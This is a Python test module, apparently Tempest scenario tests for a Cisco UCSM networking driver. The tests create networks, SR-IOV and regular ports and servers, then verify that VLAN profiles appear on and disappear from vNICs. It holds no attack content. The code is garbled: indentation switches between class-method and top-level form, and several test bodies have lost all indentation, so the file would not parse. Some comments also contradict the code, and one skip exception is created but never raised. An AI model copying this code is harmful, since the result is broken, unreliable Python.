    waiters.wait_for_server_termination(self.servers_client, server['id'])
    self.ports_client.delete_port(port['id'])
    self._delete_network(network)
    self.timed_assert(self.assertEmpty,
                      lambda: self.ucsm.get_vlan_profile(vlan_id))
    # Verify the vlan has been removed from both vnics
    for service_profile in self.controller_host_dict.values():
        for eth_name in self.eth_names:
            self.timed_assert(
                self.assertEmpty,
                lambda: self.ucsm.get_ether_vlan(
                    service_profile, eth_name, vlan_id))
@test.attr(type='non-sriov')
def test_create_delete_bulk_networks(self):
    """Covered test cases:

    * Create bulk vlan profiles
    * Add bulk vlans to both vnics
    * Delete bulk vlans from both vnics
    """
    self._verify_single_ucsm_configured()
    # Create networks
    names = [data_utils.rand_name('network-') for i in range(5)]
    data = {'networks': [{'name': name} for name in names]}
    networks = self.networks_client.create_bulk_networks(**data)['networks']
    vlan_ids = [self.admin_networks_client.show_network(n['id'])
                ['network']['provider:segmentation_id'] for n in networks]
    # Create subnets (DHCP enabled)
    cidr = netaddr.IPNetwork(CONF.network.project_network_cidr)
    mask_bits = CONF.network.project_network_mask_bits
    cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
    names = [data_utils.rand_name('subnet-')
             for i in range(len(networks))]
    subnets_list = []
    for i in range(len(names)):
        p1 = {
            'network_id': networks[i]['id'],
            'cidr': str(cidrs[i]),
            'name': names[i],
            'ip_version': 4
        }
        subnets_list.append(p1)
    self.subnets_client.create_bulk_subnets(**{'subnets': subnets_list})
    # Verify VLAN Profiles have not been created yet because there are no
    # active ports
    for vlan_id in vlan_ids:
        self.timed_assert(self.assertEmpty,
                          lambda: self.ucsm.get_vlan_profile(vlan_id))
    # Boot one server per network, each on its own port.
    ports_list = []
    servers_list = []
    for network in networks:
        port = self._create_port(
            network['id'], security_groups=[self.security_group['id']])
        server = self._create_server(data_utils.rand_name('server-smoke'),
                                     port_id=port['id'])
        ports_list.append(port)
        servers_list.append(server)
    # Get vlan ids and verify vlan profiles have been created
    for vlan_id in vlan_ids:
        self.timed_assert(self.assertNotEmpty,
                          lambda: self.ucsm.get_vlan_profile(vlan_id))
    # Verify all vlans have been added to both vnics.
    # Bug fix: previously only the last vlan_id left over from the loop
    # above was checked; every vlan must be present on every vnic.
    for vlan_id in vlan_ids:
        for service_profile in self.controller_host_dict.values():
            for eth_name in self.eth_names:
                self.timed_assert(
                    self.assertNotEmpty,
                    lambda: self.ucsm.get_ether_vlan(
                        service_profile, eth_name, vlan_id))
    # Delete networks and verify all vlan profiles have been removed
    for server in servers_list:
        self.servers_client.delete_server(server['id'])
        # Bug fix: wait for each deleted server -- previously the
        # literal list ['id'] was passed instead of server['id'].
        waiters.wait_for_server_termination(self.servers_client,
                                            server['id'])
    for port in ports_list:
        self.ports_client.delete_port(port['id'])
    self._delete_networks(networks)
    for vlan_id in vlan_ids:
        self.timed_assert(self.assertEmpty,
                          lambda: self.ucsm.get_vlan_profile(vlan_id))
    # Verify all vlans have been removed from both vnics (checked for
    # every vlan, not just the last one -- see bug fix note above).
    for vlan_id in vlan_ids:
        for service_profile in self.controller_host_dict.values():
            for eth_name in self.eth_names:
                self.timed_assert(
                    self.assertEmpty,
                    lambda: self.ucsm.get_ether_vlan(
                        service_profile, eth_name, vlan_id))
@testtools.skip("Feature not implemented")
@test.attr(type='non-sriov')
def test_create_vlan_profile_invalid_vlan_id(self):
    """Covered test cases:

    * Driver does not create VLAN profiles if VLAN ID >= 4000
    """
    # Pick a segmentation id inside the range the driver should reject.
    segmentation_id = random.randint(4000, 4093)
    kwargs = {'provider:network_type': 'vlan',
              'provider:physical_network': 'physnet1',
              'provider:segmentation_id': segmentation_id}
    # TODO(nfedotov): Should raise exception.
    # UCSM does not allow to create vlans
    # from 4000 to 4093 (need to figure out correct values)
    self.admin_networks_client.create_network(
        name=data_utils.rand_name('network-'), **kwargs)['network']
@test.attr(type='sriov')
# @testtools.skip("https://bugs.launchpad.net/"
# "networking-cisco/+bug/1476721")
def test_create_delete_sriov_port(self):
    """Covered test cases:

    * Creating SR-IOV port and port profile
    * Deleting SR-IOV port and port profile
    * Attaching instance to SR-IOV port
    """
    self._verify_single_ucsm_configured()
    self._verify_sriov_configured()
    # Create network, subnet and port (type=direct)
    network_obj = self._create_network()
    self.assertEqual('ACTIVE', network_obj['status'])
    self._create_subnet(network_obj, enable_dhcp=False)
    kwargs = {'binding:vnic_type': 'direct'}
    port_obj = self._create_port(network_obj['id'], **kwargs)
    create_kwargs = {
        'networks': [
            {'port': port_obj['id']},
        ]
    }
    # Create server
    server_name = data_utils.rand_name('server-smoke')
    server = self.create_server(name=server_name,
                                **create_kwargs)
    # Verify vlan profile has been created
    network = self.admin_networks_client.show_network(
        network_obj['id'])['network']
    vlan_id = network['provider:segmentation_id']
    self.timed_assert(self.assertNotEmpty,
                      lambda: self.ucsm.get_vlan_profile(vlan_id))
    # Verify port profile has been created
    port = self.admin_ports_client.show_port(port_obj['id'])['port']
    port_profile_id = port['binding:vif_details'].get('profileid', None)
    # Bug fix: assert before use -- building the DN from None below
    # would raise TypeError and mask the real failure.
    self.assertIsNotNone(port_profile_id,
                         'vif_details have a profileid attribute')
    port_profile_dn = 'fabric/lan/profiles/vnic-' + port_profile_id
    self.timed_assert(self.assertNotEmpty,
                      lambda: self.ucsm.get_port_profile(port_profile_dn))
    port_profile = self.ucsm.get_port_profile(port_profile_dn)
    self.assertNotEmpty(port_profile,
                        'Port profile has been created in UCSM')
    # Verify the port profile has a correct VLAN
    self.timed_assert(self.assertNotEmpty,
                      lambda: self.ucsm.get_vnic_ether_if(port_profile))
    port_profile_vlans = self.ucsm.get_vnic_ether_if(port_profile)
    self.assertEqual(str(vlan_id), port_profile_vlans[0].Vnet,
                     'Vlan has been added to port profile')
    # Delete server, port, network. Verify port profile and vlan have
    # been removed
    self.servers_client.delete_server(server['id'])
    waiters.wait_for_server_termination(self.servers_client, server['id'])
    self.ports_client.delete_port(port_obj['id'])
    network_obj.delete()
    # self.assertEmpty(self.ucsm.get_port_profile(port_profile_dn),
    #                  'Port profile has been removed in UCSM')
    # self.timed_assert(self.assertEmpty,
    #                   lambda: self.ucsm.get_vlan_profile(vlan_id))
@test.attr(type='sriov')
# @testtools.skip("https://bugs.launchpad.net/"
# "networking-cisco/+bug/1476721")
def test_create_delete_bulk_sriov_ports(self):
    """Covered test cases:

    * Create bulk port profiles
    * Delete bulk port profiles
    """
    self._verify_single_ucsm_configured()
    self._verify_sriov_configured()
    # NOTE: Python 2 idioms here (list-returning dict.keys(), iteritems).
    master_host = random.choice(self.compute_host_dict.keys())
    # Create networks
    names = [data_utils.rand_name('network-')
             for i in range(self.virtual_functions)]
    data = {'networks': [{'name': name} for name in names]}
    networks = self.networks_client.create_bulk_networks(**data)['networks']
    # Create subnets (DHCP disabled -- SR-IOV ports)
    cidr = netaddr.IPNetwork(CONF.network.project_network_cidr)
    mask_bits = CONF.network.project_network_mask_bits
    cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
    names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
    subnets_list = []
    for i in range(len(names)):
        net = {
            'network_id': networks[i]['id'],
            'cidr': str(cidrs[i]),
            'name': names[i],
            'ip_version': 4,
            'enable_dhcp': False
        }
        subnets_list.append(net)
    self.subnets_client.create_bulk_subnets(**{'subnets': subnets_list})
    # Create ports: one 'direct' (SR-IOV) port per network, keyed by the
    # network's vlan id.
    ports_data = {}
    for network in networks:
        net_id = network['id']
        vlan_id = self.admin_networks_client.show_network(
            net_id)['network']['provider:segmentation_id']
        port = {
            'network_id': net_id,
            'binding:vnic_type': 'direct'
        }
        ports_data[vlan_id] = port
    ports_list = self.ports_client.create_bulk_ports(
        **{'ports': ports_data.values()})['ports']
    # Boot servers
    ports = {}
    servers = {}
    for port in ports_list:
        server_name = data_utils.rand_name('server-smoke')
        server = self._create_server(
            server_name, port_id=port['id'],
            availability_zone='nova:' + master_host)
        # Create ports dictionary
        # Assume we create one port per network.
        # Will identify port by network_id
        for vlan_id, pd in ports_data.iteritems():
            if port['network_id'] == pd['network_id']:
                ports[vlan_id] = self.admin_ports_client.show_port(
                    port['id'])['port']
                servers[vlan_id] = server
                break
    # Verify port profiles have been created
    for vlan_id, port in ports.iteritems():
        self.timed_assert(self.assertNotEmpty,
                          lambda: self.ucsm.get_vlan_profile(vlan_id))
        # Verify port profile has been created
        port_profile_id = port['binding:vif_details'].get('profileid',
                                                          None)
        # Bug fix: assert before use -- building the DN from None would
        # raise TypeError and mask the real failure.
        self.assertIsNotNone(port_profile_id,
                             'vif_details have a profileid attribute')
        port_profile_dn = 'fabric/lan/profiles/vnic-' + port_profile_id
        self.timed_assert(self.assertNotEmpty,
                          lambda: self.ucsm.get_port_profile(port_profile_dn))
        port_profile = self.ucsm.get_port_profile(port_profile_dn)
        self.assertNotEmpty(port_profile,
                            'Port profile has been created in UCSM')
        self.timed_assert(self.assertNotEmpty,
                          lambda: self.ucsm.get_vnic_ether_if(port_profile))
        port_profile_vlans = self.ucsm.get_vnic_ether_if(port_profile)
        self.assertEqual(str(vlan_id), port_profile_vlans[0].Vnet,
                         'Vlan has been added to port profile')
    # Delete servers and ports
    for vlan_id, server in servers.iteritems():
        self.servers_client.delete_server(server['id'])
        waiters.wait_for_server_termination(self.servers_client, server['id'])
        self.ports_client.delete_port(ports[vlan_id]['id'])
    # Delete networks
    for network in networks:
        self.networks_client.delete_network(network['id'])
    # Verify all port profiles have been removed
    # for vlan_id, port in ports.iteritems():
    #     port_profile_id = port['binding:vif_details'].get('profileid',
    #                                                       None)
    #     port_profile_dn = 'fabric/lan/profiles/vnic-' + port_profile_id
    #     self.assertEmpty(self.ucsm.get_port_profile(port_profile_dn),
    #                      'Port profile has been removed in UCSM')
    #     self.timed_assert(self.assertEmpty,
    #                       lambda: self.ucsm.get_vlan_profile(vlan_id))
@test.attr(type='sriov')
def test_sriov_intra_vm_to_vm(self):
    """Covered test cases:

    * Intra VM to VM connectivity
    """
    self._verify_connectivity_tests_enabled()
    self._verify_single_ucsm_configured()
    self._verify_sriov_configured()
    compute_host = random.choice(self.compute_host_dict.keys())
    network, _subnet, _router = self.create_networks()
    port_kwargs = {'security_groups': [self.security_group['id']],
                   'binding:vnic_type': 'direct'}
    zone = 'nova:' + compute_host
    # Boot two SR-IOV servers on the SAME compute host.
    booted = []
    for _ in range(2):
        sriov_port = self._create_port(network['id'], **port_kwargs)
        booted.append(self._create_server(
            data_utils.rand_name('server-smoke'),
            network['id'], port_id=sriov_port['id'],
            availability_zone=zone))
    self.assert_vm_to_vm_connectivity(booted[0], booted[1])
@test.attr(type='sriov')
def test_sriov_inter_vm_to_vm(self):
"""Covered test cases:
* Inter VM to VM connectivity
"""
self._verify_connectivity_tests_enabled()
self._verify_single_ucsm_configured()
self._verify_sriov_configured()
self._verify_more_than_one_compute_host_exist()
master_host, slave_host = random.sample(self.compute_host_dict.keys(), 2)
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']],
'binding:vnic_type': 'direct'}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on the same compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + slave_host)
self.assert_vm_to_vm_connectivity(server1, server2)
    @test.attr(type='non-sriov')
    def test_non_sriov_port_attach(self):
        """Covered test cases:
        * Attach instance to non-SR-IOV port

        Boots one instance on a regular (non-direct) port, then checks the
        UCSM driver created the VLAN profile and trunked the VLAN onto the
        vNICs of the compute host that Neutron bound the port to.
        """
        self._verify_single_ucsm_configured()
        network_obj, subnet_obj, router_obj = self.create_networks()
        port_obj = self._create_port(
            network_obj['id'], security_groups=[self.security_group['id']])
        server = self._create_server(data_utils.rand_name('server-smoke'),
                                     network_obj['id'], port_id=port_obj['id'])
        # Verify vlan profile has been created.  The segmentation id is
        # only visible through the admin client.
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: self.ucsm.get_vlan_profile(vlan_id))
        # Verify vlan has been added to a compute where instance is launched.
        # binding:host_id identifies the compute host Neutron actually chose.
        port = self.admin_ports_client.show_port(port_obj['id'])['port']
        binding_host_id = port['binding:host_id']
        # NOTE(review): the lambda closes over the loop variable eth_name,
        # which is safe only because timed_assert is presumed to evaluate it
        # within the same iteration -- confirm timed_assert's semantics.
        for eth_name in self.eth_names:
            self.timed_assert(
                self.assertNotEmpty,
                lambda: self.ucsm.get_ether_vlan(
                    self.compute_host_dict[binding_host_id], eth_name, vlan_id))
        floating_ip = self.create_floating_ip(server)
        self.check_public_network_connectivity(server, floating_ip)
@test.attr(type='non-sriov')
def test_non_sriov_intra_vm_to_vm(self):
"""Covered test cases:
* Intra VM to VM connectivity
"""
self._verify_single_ucsm_configured()
self._verify_connectivity_tests_enabled()
master_host = random.choice(self.compute_host_dict.keys())
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on the same compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + master_host)
self.assert_vm_to_vm_connectivity(server1, server2)
@test.attr(type='non-sriov')
def test_non_sriov_inter_vm_to_vm(self):
"""Covered test cases:
* Inter VM to VM connectivity
"""
self._verify_single_ucsm_configured()
self._verify_connectivity_tests_enabled()
self._verify_more_than_one_compute_host_exist()
if len(self.compute_host_dict.keys()) < 2:
raise self.skipException('Not enough amount of compute hosts. Need at least 2. '
'Update tempest.conf')
master_host, slave_host = random.sample(self.compute_host_dict.keys(), 2)
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + slave_host)
self.assert_vm_to_vm_connectivity(server1, server2)
    @test.attr(type='non-sriov')
    def test_non_sriov_delete_second_instance(self):
        """Covered test cases:
        * The driver does not delete vlan if there is at
        least one instance on a host

        Boots two instances on the same host, verifies the VLAN config,
        deletes one instance, then verifies the VLAN profile and the
        per-vNIC VLAN are still present for the surviving instance.
        """
        self._verify_single_ucsm_configured()
        self._verify_connectivity_tests_enabled()
        master_host = random.choice(self.compute_host_dict.keys())
        network_obj, subnet_obj, router_obj = self.create_networks()
        kwargs = {'security_groups': [self.security_group['id']]}
        # Create server #1
        port_obj1 = self._create_port(network_obj['id'], **kwargs)
        server1 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj1['id'],
            availability_zone='nova:' + master_host)
        # Create server #2 on the same host
        port_obj2 = self._create_port(network_obj['id'], **kwargs)
        server2 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj2['id'],
            availability_zone='nova:' + master_host)
        # Verify vlan profile has been created
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: self.ucsm.get_vlan_profile(vlan_id))
        # Verify vlan has been added to a host where instance is launched
        for eth_name in self.eth_names:
            self.timed_assert(
                self.assertNotEmpty,
                lambda: self.ucsm.get_ether_vlan(
                    self.compute_host_dict[master_host], eth_name, vlan_id))
        # Remove only the second instance and its port.
        self.servers_client.delete_server(server2['id'])
        waiters.wait_for_server_termination(self.servers_client, server2['id'])
        self.ports_client.delete_port(port_obj2['id'])
        # Sleep some time to let neutron process all events.
        time.sleep(20)
        # Verify the vlan profile still exists: server1 keeps the VLAN alive.
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: self.ucsm.get_vlan_profile(vlan_id))
        # Verify the vlan is still trunked on the host of the surviving instance
        for eth_name in self.eth_names:
            self.timed_assert(
                self.assertNotEmpty,
                lambda: self.ucsm.get_ether_vlan(
                    self.compute_host_dict[master_host], eth_name, vlan_id))
        floating_ip1 = self.create_floating_ip(server1)
        self.check_public_network_connectivity(server1, floating_ip1)
    @test.attr(type=['non-sriov', 'multi-ucsm'])
    def test_multi_create_delete_network(self):
        """Covered test cases:
        * The driver creates vlan profile in a certain UCSM
        """
        self._verify_multi_ucsm_configured()
        # UCSMs to which controllers are connected
        ucsm_clients = list()
        # NOTE(review): 'conf' is read both as an attribute
        # (conf.controller_host_dict) and as a mapping (conf['ucsm_ip']),
        # so it is presumably a dict-like config object supporting both --
        # confirm against the base class that builds multi_ucsm_conf.
        for conf in self.multi_ucsm_conf.values():
            if conf.controller_host_dict:
                ucsm_clients.append(self.multi_ucsm_clients[conf['ucsm_ip']])
        # Create network and subnet (DHCP enabled)
        network = self._create_network()
        self.assertEqual('ACTIVE', network['status'])
        self._create_subnet(network)
        port = self._create_port(
            network['id'], security_groups=[self.security_group['id']])
        # Get a vlan id and verify a vlan profile has been created
        network = self.admin_networks_client.show_network(network['id'])['network']
        vlan_id = network['provider:segmentation_id']
        for ucsm_client in ucsm_clients:
            self.timed_assert(self.assertNotEmpty, lambda: ucsm_client.get_vlan_profile(vlan_id))
        # # Verify vlan has been added to both vnics
        # for ucsm_client in ucsm_clients:
        #     conf = self.multi_ucsm_conf[ucsm_client.ip]
        #     for controller_sp in conf['controller_host_dict'].values():
        #         for eth_name in conf['eth_names']:
        #             self.timed_assert(
        #                 self.assertNotEmpty,
        #                 lambda: self.ucsm.get_ether_vlan(controller_sp, eth_name, vlan_id))
        # Delete network and verify that the vlan profile has been removed
        self.ports_client.delete_port(port['id'])
        self._delete_network(network)
        for ucsm_client in ucsm_clients:
            self.timed_assert(self.assertEmpty,
                              lambda: ucsm_client.get_vlan_profile(vlan_id))
        # # Verify the vlan has been removed from both vnics
        # for ucsm_client in ucsm_clients:
        #     conf = self.multi_ucsm_conf[ucsm_client.ip]
        #     for controller_sp in conf['controller_host_dict'].values():
        #         for eth_name in conf['eth_names']:
        #             self.timed_assert(
        #                 self.assertEmpty,
        #                 lambda: self.ucsm.get_ether_vlan(controller_sp, eth_name, vlan_id))
    @test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
    def test_multi_desired_ucsm_vnics_configured(self):
        """Covered test cases:
        Multi-UCSM
        * The driver creates vlan profile in a certain UCSM
        * The driver adds vlan profile to vNIC of a service profile located in a certain UCSM
        * The driver deletes vlan profile to vNIC of a service profile located in a certain UCSM
        * Right vNICs are configured in a certain UCSM
        Service Profile templates
        * UCSM driver adds vlans to a vNIC of Service Profile template
        * UCSM driver deletes vlans from vNIC of a Service Profile template
        * VLAN profile is deleted once network is removed
        """
        self._verify_multi_ucsm_configured()
        self._verify_connectivity_tests_enabled()
        network_obj, subnet_obj, router_obj = self.create_networks()
        kwargs = {'security_groups': [self.security_group['id']]}
        port_obj = self._create_port(network_obj['id'], **kwargs)
        # Pick a random UCSM, then a random compute (and its service
        # profile) managed by that UCSM; the instance is pinned there.
        random_ucsm = random.choice(self.multi_ucsm_conf.values())
        random_ucsm_client = self.multi_ucsm_clients[random_ucsm['ucsm_ip']]
        random_compute = random.choice(random_ucsm['compute_host_dict'].keys())
        random_compute_sp = random_ucsm['compute_host_dict'][random_compute]
        server = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj['id'],
            availability_zone='nova:' + random_compute)
        # Verify vlan profile has been created
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: random_ucsm_client.get_vlan_profile(vlan_id))
        # Verify vlan has been added to a compute where instance is launched
        port = self.admin_ports_client.show_port(port_obj['id'])['port']
        binding_host_id = port['binding:host_id']
        self.assertEqual(random_compute, binding_host_id, 'binding:host_id same as we want')
        for eth_name in random_ucsm['eth_names']:
            self.timed_assert(
                self.assertNotEmpty,
                lambda: random_ucsm_client.get_ether_vlan(random_compute_sp, eth_name, vlan_id))
        # Tear everything down and verify the VLAN configuration is removed.
        self.servers_client.delete_server(server['id'])
        waiters.wait_for_server_termination(self.servers_client, server['id'])
        self.ports_client.delete_port(port_obj['id'])
        self.subnets_client.delete_subnet(subnet_obj['id'])
        network_obj.delete()
        self.timed_assert(self.assertEmpty,
                          lambda: random_ucsm_client.get_vlan_profile(vlan_id))
        for eth_name in random_ucsm['eth_names']:
            self.timed_assert(
                self.assertEmpty,
                lambda: random_ucsm_client.get_ether_vlan(random_compute_sp, eth_name, vlan_id))
    @test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
    def test_multi_inter_vm_to_vm_computes_attached_to_same_fi(self):
        """Covered test cases:
        Multi-UCSM
        * Inter VM to VM connectivity
        Service Profile templates
        * Inter VM to VM connectivity. Computes attached to the same UCSM
        * Instance is able to get IP address from DHCP service
        * VLAN profile is not deleted if it used by at least one Service Profile template
        * Right vNICs are configured in a certain UCSM
        """
        self._verify_multi_ucsm_configured(need_amount=1)
        self._verify_connectivity_tests_enabled()
        self._verify_more_than_one_compute_host_exist()
        # Two distinct computes behind the same (randomly chosen) UCSM.
        ucsm_conf1 = random.choice(self.multi_ucsm_conf.values())
        ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
        compute1, compute2 = random.sample(ucsm_conf1['compute_host_dict'].keys(), 2)
        network_obj, subnet_obj, router_obj = self.create_networks()
        kwargs = {'security_groups': [self.security_group['id']]}
        # Create server #1
        port_obj1 = self._create_port(network_obj['id'], **kwargs)
        server1 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj1['id'],
            availability_zone='nova:' + compute1)
        # Create server #2 on another compute
        port_obj2 = self._create_port(network_obj['id'], **kwargs)
        server2 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj2['id'],
            availability_zone='nova:' + compute2)
        self.assert_vm_to_vm_connectivity(server1, server2)
        # Delete one server and verify VLAN profile still exists
        self.servers_client.delete_server(server1['id'])
        waiters.wait_for_server_termination(self.servers_client, server1['id'])
        self.ports_client.delete_port(port_obj1['id'])
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: ucsm_client1.get_vlan_profile(vlan_id))
        # Delete another server, ports, subnet, network.
        # Verify VLAN is removed
        self.servers_client.delete_server(server2['id'])
        waiters.wait_for_server_termination(self.servers_client, server2['id'])
        self.ports_client.delete_port(port_obj2['id'])
        self.subnets_client.delete_subnet(subnet_obj['id'])
        network_obj.delete()
        self.timed_assert(self.assertEmpty,
                          lambda: ucsm_client1.get_vlan_profile(vlan_id))
        # The VLAN must be gone from every vNIC of both computes' service
        # profiles once no port on the network remains.
        for compute in (compute1, compute2):
            for eth_name in ucsm_conf1['eth_names']:
                compute_sp = ucsm_conf1['compute_host_dict'][compute]
                self.timed_assert(
                    self.assertEmpty,
                    lambda: ucsm_client1.get_ether_vlan(compute_sp, eth_name, vlan_id))
    @test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
    def test_multi_inter_vm_to_vm_computes_attached_to_different_fi(self):
        """Covered test cases:
        Multi-UCSM
        * Inter VM to VM connectivity
        Service Profile templates
        * Inter VM to VM connectivity. Computes attached to different UCSMs
        * Instance is able to get IP address from DHCP service
        * VLAN profile is not deleted if it used by at least one Service Profile template
        * Right vNICs are configured in a certain UCSM
        """
        self._verify_multi_ucsm_configured(need_amount=2)
        self._verify_connectivity_tests_enabled()
        self._verify_more_than_one_compute_host_exist()
        # One compute behind each of two distinct UCSMs.
        ucsm_conf1, ucsm_conf2 = random.sample(self.multi_ucsm_conf.values(), 2)
        ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
        ucsm_client2 = self.multi_ucsm_clients[ucsm_conf2['ucsm_ip']]
        compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
        compute2 = random.choice(ucsm_conf2['compute_host_dict'].keys())
        network_obj, subnet_obj, router_obj = self.create_networks()
        kwargs = {'security_groups': [self.security_group['id']]}
        # Create server #1
        port_obj1 = self._create_port(network_obj['id'], **kwargs)
        server1 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj1['id'],
            availability_zone='nova:' + compute1)
        # Create server #2 on another compute
        port_obj2 = self._create_port(network_obj['id'], **kwargs)
        server2 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj2['id'],
            availability_zone='nova:' + compute2)
        self.assert_vm_to_vm_connectivity(server1, server2)
        # Delete one server and verify VLAN profile still exists
        self.servers_client.delete_server(server1['id'])
        waiters.wait_for_server_termination(self.servers_client, server1['id'])
        self.ports_client.delete_port(port_obj1['id'])
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: ucsm_client1.get_vlan_profile(vlan_id))
        self.timed_assert(self.assertNotEmpty,
                          lambda: ucsm_client2.get_vlan_profile(vlan_id))
        # Delete another server, ports, subnet, network.
        # Verify VLAN is removed
        self.servers_client.delete_server(server2['id'])
        waiters.wait_for_server_termination(self.servers_client, server2['id'])
        self.ports_client.delete_port(port_obj2['id'])
        self.subnets_client.delete_subnet(subnet_obj['id'])
        network_obj.delete()
        self.timed_assert(self.assertEmpty,
                          lambda: ucsm_client1.get_vlan_profile(vlan_id))
        self.timed_assert(self.assertEmpty,
                          lambda: ucsm_client2.get_vlan_profile(vlan_id))
        # Each UCSM is checked with its own client/compute pairing.
        for conf, cl, cp in ((ucsm_conf1, ucsm_client1, compute1), (ucsm_conf2, ucsm_client2, compute2)):
            for eth_name in conf['eth_names']:
                compute_sp = conf['compute_host_dict'][cp]
                self.timed_assert(
                    self.assertEmpty,
                    lambda: cl.get_ether_vlan(compute_sp, eth_name, vlan_id))
    @test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
    def test_multi_intra_vm_to_vm(self):
        """Covered test cases:
        Service Profile templates
        * Intra VM to VM connectivity
        * Instance is able to get IP address from DHCP service
        * VLAN is not deleted from a service profile template if it used by at least one neutron port on a compute host
        """
        self._verify_multi_ucsm_configured()
        self._verify_connectivity_tests_enabled()
        # One compute behind a randomly chosen UCSM hosts both instances.
        ucsm_conf1 = random.choice(self.multi_ucsm_conf.values())
        ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
        compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
        network_obj, subnet_obj, router_obj = self.create_networks()
        kwargs = {'security_groups': [self.security_group['id']]}
        # Create server #1
        port_obj1 = self._create_port(network_obj['id'], **kwargs)
        server1 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj1['id'],
            availability_zone='nova:' + compute1)
        # Create server #2 on the same compute
        port_obj2 = self._create_port(network_obj['id'], **kwargs)
        server2 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj2['id'],
            availability_zone='nova:' + compute1)
        self.assert_vm_to_vm_connectivity(server1, server2)
        # Delete one server and verify VLAN profile still exists
        self.servers_client.delete_server(server1['id'])
        waiters.wait_for_server_termination(self.servers_client, server1['id'])
        self.ports_client.delete_port(port_obj1['id'])
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: ucsm_client1.get_vlan_profile(vlan_id))
        # Delete another server, ports, subnet, network.
        # Verify VLAN is removed
        self.servers_client.delete_server(server2['id'])
        waiters.wait_for_server_termination(self.servers_client, server2['id'])
        self.ports_client.delete_port(port_obj2['id'])
        self.subnets_client.delete_subnet(subnet_obj['id'])
        network_obj.delete()
        self.timed_assert(self.assertEmpty,
                          lambda: ucsm_client1.get_vlan_profile(vlan_id))
        for eth_name in ucsm_conf1['eth_names']:
            compute_sp = ucsm_conf1['compute_host_dict'][compute1]
            self.timed_assert(
                self.assertEmpty,
                lambda: ucsm_client1.get_ether_vlan(compute_sp, eth_name, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'vnic-templates'])
def test_multi_vnic_templates_create_delete_network(self):
"""Covered test cases:
* UCSM Diriver adds vlans to a vNIC template
* UCSM Driver deletes vlans from a vNIC template
"""
self._verify_vnic_templates_configured()
random_physnet = random.choice(CONF.ucsm.physnets)
# UCSMs to which computes are connected and vNIC template is associated with "random_physnet"
ucsm_list = list()
for conf in self.ucsm_confs_with_vnic_templates:
if conf.compute_host_dict and random_physnet in conf.vnic_template_dict.keys():
ucsm_list.append(conf)
if len(ucsm_list) == 0:
self.skipException('Computes do not use vNIC templates. Check tempest.conf')
# Create network as an admin user. Only admin user is allowed to set "provider:physical_network"
params = {'provider:network_type': 'vlan',
'provider:physical_network': random_physnet}
network_obj = self._create_network(networks_client=self.admin_networks_client, **params)
